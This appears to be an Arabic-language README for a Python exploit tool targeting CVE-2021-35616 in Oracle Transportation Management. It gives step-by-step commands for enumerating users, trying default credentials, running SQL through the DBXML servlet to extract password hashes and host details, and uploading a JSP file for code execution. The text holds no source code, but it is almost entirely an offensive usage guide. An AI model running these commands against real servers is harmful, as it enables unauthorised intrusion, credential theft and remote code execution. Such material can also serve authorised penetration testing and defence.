
أداة بايثون لاستغلال CVE-2021-35616
أداة بايثون لاستغلال CVE-2021-35616
يعمل السكربت عبر وحدات (modules)، وقد نفّذتها بالترتيب التالي:
► تعداد أسماء المستخدمين
► البحث عن بيانات اعتماد افتراضية
► تنفيذ استعلام SQL باستخدام DBXML servlet
► الاستغلال الكامل وتنفيذ JSP
بناء جملة السكربت كما يلي:
.\OracleOTM.py {module} {host TXT file} {additional parameters}
تعداد أسماء المستخدمين: .\OracleOTM.py enum {hosts TXT file} -u users.txt
البحث عن بيانات اعتماد افتراضية: .\OracleOTM.py default {hosts TXT file}
تنفيذ استعلام SQL باستخدام DBXML servlet: .\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"
كما أعددت بعض الاستعلامات الجاهزة التي وجدتها مفيدة؛ يمكنك الوصول إليها مباشرة كما يلي:
.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os
OS – استخراج نظام تشغيل الخادم
Osuser – استخراج مستخدم نظام التشغيل الذي يشغّل قاعدة البيانات
Hostname – اسم مضيف خادم قاعدة البيانات
Hostip – عنوان IP لخادم قاعدة البيانات
Passwords – استخراج مستخدمي OTM وكلمات المرور المجزّأة (hashed) الخاصة بهم
Oraversion – إصدار قاعدة البيانات
Dbusershash – تجزئات كلمات مرور مستخدمي قاعدة البيانات
Dbfileslocation – موقع ملفات قاعدة البيانات في نظام التشغيل
الاستغلال الكامل وتنفيذ JSP: .\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"